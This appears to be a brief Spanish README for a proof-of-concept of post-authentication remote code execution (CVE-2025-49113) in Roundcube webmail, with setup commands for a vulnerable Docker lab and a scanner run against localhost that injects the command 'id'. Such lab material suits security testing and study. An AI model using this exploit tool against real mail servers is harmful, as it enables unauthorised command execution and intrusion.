
Prueba de concepto de ejecución remota de código post-autenticación para CVE-2025-49113 en el webmail Roundcube. Incluye un entorno Docker vulnerable y un escáner Python para probar la inyección de comandos.
cd Stand
docker-compose up -d
cd PoC/src
python3 scanner.py --target http://localhost:9000 --username test --password test --command "id"
test / testhttp://localhost:9000